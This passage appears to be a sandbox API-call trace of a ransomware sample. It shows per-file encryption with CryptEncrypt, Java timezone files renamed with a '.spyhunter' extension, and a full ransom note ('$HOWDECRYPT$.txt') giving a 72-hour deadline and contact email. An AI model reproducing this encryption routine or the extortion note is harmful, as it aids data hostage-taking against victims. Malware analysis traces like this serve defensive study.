hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5a4*=0x61c, lpOverlapped=0x0) returned 1 [0168.836] GetProcessHeap () returned 0x2c0000 [0168.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.836] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.836] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x248e5e4*, lpNumberOfBytesWritten=0x248e5a4*=0x4, lpOverlapped=0x0) returned 1 [0168.836] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5a4*=0x30, lpOverlapped=0x0) returned 1 [0168.836] CloseHandle (hObject=0x9c) returned 1 [0168.836] GetProcessHeap () returned 0x2c0000 [0168.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.837] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.spyhunter") returned 69 [0168.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels.spyhunter")) returned 1 [0168.837] GetProcessHeap () returned 0x2c0000 [0168.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.837] GetProcessHeap () returned 0x2c0000 [0168.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.837] GetProcessHeap () returned 0x2c0000 [0168.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebde80 | out: hHeap=0x2c0000) returned 1 [0168.837] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5e0 | out: pbBuffer=0x248e5e0) returned 1 [0168.837] GetProcessHeap () returned 0x2c0000 [0168.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5d8*=0x30) returned 1 [0168.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.838] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST") returned 47 [0168.838] StrStrW (lpFirst="EST", lpSrch=".txt") returned 0x0 [0168.838] GetProcessHeap () returned 0x2c0000 [0168.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.838] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e59c*=0x1b, lpOverlapped=0x0) returned 1 [0168.839] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.839] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e59c*=0x1b, lpOverlapped=0x0) returned 1 [0168.839] GetProcessHeap () returned 0x2c0000 [0168.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.839] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.839] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x248e5dc*, lpNumberOfBytesWritten=0x248e59c*=0x4, lpOverlapped=0x0) returned 1 [0168.839] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e59c*=0x30, lpOverlapped=0x0) returned 1 [0168.839] CloseHandle (hObject=0x9c) returned 1 [0168.839] GetProcessHeap () returned 0x2c0000 [0168.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.840] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.spyhunter") returned 57 [0168.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est.spyhunter")) returned 1 [0168.841] GetProcessHeap () returned 0x2c0000 [0168.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.841] GetProcessHeap () returned 0x2c0000 [0168.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.841] GetProcessHeap () returned 0x2c0000 [0168.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d888 | out: hHeap=0x2c0000) returned 1 [0168.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5e0 | out: pbBuffer=0x248e5e0) returned 1 [0168.841] GetProcessHeap () returned 0x2c0000 [0168.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5d8*=0x30) returned 1 [0168.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.842] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET") returned 47 [0168.842] StrStrW (lpFirst="EET", lpSrch=".txt") returned 0x0 [0168.842] GetProcessHeap () returned 0x2c0000 [0168.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.842] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e59c*=0x430, lpOverlapped=0x0) returned 1 [0168.878] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.878] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e59c*=0x430, lpOverlapped=0x0) returned 1 [0168.878] GetProcessHeap () returned 0x2c0000 [0168.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.878] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.878] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x248e5dc*, lpNumberOfBytesWritten=0x248e59c*=0x4, lpOverlapped=0x0) returned 1 [0168.878] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e59c*=0x30, lpOverlapped=0x0) returned 1 [0168.878] CloseHandle (hObject=0x9c) returned 1 [0168.878] GetProcessHeap () returned 0x2c0000 [0168.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.879] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.spyhunter") returned 57 [0168.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet.spyhunter")) returned 1 [0168.879] GetProcessHeap () returned 0x2c0000 [0168.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.880] GetProcessHeap () returned 0x2c0000 [0168.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.880] GetProcessHeap () returned 0x2c0000 [0168.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d9d8 | out: hHeap=0x2c0000) returned 1 [0168.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5d8 | out: pbBuffer=0x248e5d8) returned 1 [0168.880] GetProcessHeap () returned 0x2c0000 [0168.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5d0*=0x30) returned 1 [0168.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.897] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart") returned 60 [0168.897] StrStrW (lpFirst="Hobart", lpSrch=".txt") returned 0x0 [0168.897] GetProcessHeap () returned 0x2c0000 [0168.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.897] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e594, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e594*=0x508, lpOverlapped=0x0) returned 1 [0168.937] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffaf8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.937] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x508, lpNumberOfBytesWritten=0x248e594, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e594*=0x508, lpOverlapped=0x0) returned 1 [0168.937] GetProcessHeap () returned 0x2c0000 [0168.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.937] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.937] WriteFile (in: hFile=0xa0, lpBuffer=0x248e5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e594, lpOverlapped=0x0 | out: lpBuffer=0x248e5d4*, lpNumberOfBytesWritten=0x248e594*=0x4, lpOverlapped=0x0) returned 1 [0168.937] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e594, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e594*=0x30, lpOverlapped=0x0) returned 1 [0168.937] CloseHandle (hObject=0xa0) returned 1 [0168.937] GetProcessHeap () returned 0x2c0000 [0168.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.938] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.spyhunter") returned 70 [0168.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart.spyhunter")) returned 1 [0168.938] GetProcessHeap () returned 0x2c0000 [0168.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.938] GetProcessHeap () returned 0x2c0000 [0168.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.938] GetProcessHeap () returned 0x2c0000 [0168.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb948 | out: hHeap=0x2c0000) returned 1 [0168.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.943] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0168.943] WriteFile (in: hFile=0xa0, lpBuffer=0x248e50b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x248e50b*, lpNumberOfBytesWritten=0x248e634*=0x127, lpOverlapped=0x0) returned 1 [0168.944] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0168.944] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e634, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e634*=0x2ac, lpOverlapped=0x0) returned 1 [0168.944] CloseHandle (hObject=0xa0) returned 1 [0168.944] GetProcessHeap () returned 0x2c0000 [0168.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7da58 | out: hHeap=0x2c0000) returned 1 [0168.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5d0 | out: pbBuffer=0x248e5d0) returned 1 [0168.944] GetProcessHeap () returned 0x2c0000 [0168.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.945] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5c8*=0x30) returned 1 [0168.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.945] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena") returned 62 [0168.945] StrStrW (lpFirst="St_Helena", lpSrch=".txt") returned 0x0 [0168.945] GetProcessHeap () returned 0x2c0000 [0168.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.945] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e58c*=0x41, lpOverlapped=0x0) returned 1 [0168.946] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.946] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e58c*=0x41, lpOverlapped=0x0) returned 1 [0168.946] GetProcessHeap () returned 0x2c0000 [0168.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.946] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.946] WriteFile (in: hFile=0xa0, lpBuffer=0x248e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x248e5cc*, lpNumberOfBytesWritten=0x248e58c*=0x4, lpOverlapped=0x0) returned 1 [0168.946] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e58c*=0x30, lpOverlapped=0x0) returned 1 [0168.946] CloseHandle (hObject=0xa0) returned 1 [0168.947] GetProcessHeap () returned 0x2c0000 [0168.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.947] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.spyhunter") returned 72 [0168.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena.spyhunter")) returned 1 [0168.947] GetProcessHeap () returned 0x2c0000 [0168.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.947] GetProcessHeap () returned 0x2c0000 [0168.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.947] GetProcessHeap () returned 0x2c0000 [0168.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb560 | out: hHeap=0x2c0000) returned 1 [0168.948] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5d0 | out: pbBuffer=0x248e5d0) returned 1 [0168.948] GetProcessHeap () returned 0x2c0000 [0168.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.948] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5c8*=0x30) returned 1 [0168.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0168.952] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley") returned 60 [0168.952] StrStrW (lpFirst="Stanley", lpSrch=".txt") returned 0x0 [0168.953] GetProcessHeap () returned 0x2c0000 [0168.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0168.953] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e58c*=0x26d, lpOverlapped=0x0) returned 1 [0168.953] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.953] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e58c*=0x26d, lpOverlapped=0x0) returned 1 [0168.954] GetProcessHeap () returned 0x2c0000 [0168.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0168.954] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.954] WriteFile (in: hFile=0xb0, lpBuffer=0x248e5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x248e5cc*, lpNumberOfBytesWritten=0x248e58c*=0x4, lpOverlapped=0x0) returned 1 [0168.954] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e58c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e58c*=0x30, lpOverlapped=0x0) returned 1 [0168.954] CloseHandle (hObject=0xb0) returned 1 [0168.954] GetProcessHeap () returned 0x2c0000 [0168.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.954] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.spyhunter") returned 70 [0168.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley.spyhunter")) returned 1 [0169.039] GetProcessHeap () returned 0x2c0000 [0169.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.040] GetProcessHeap () returned 0x2c0000 [0169.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.040] GetProcessHeap () returned 0x2c0000 [0169.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb498 | out: hHeap=0x2c0000) returned 1 [0169.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5c8 | out: pbBuffer=0x248e5c8) returned 1 [0169.040] GetProcessHeap () returned 0x2c0000 [0169.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5c0*=0x30) returned 1 [0169.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.041] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira") returned 60 [0169.041] StrStrW (lpFirst="Madeira", lpSrch=".txt") returned 0x0 [0169.041] GetProcessHeap () returned 0x2c0000 [0169.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 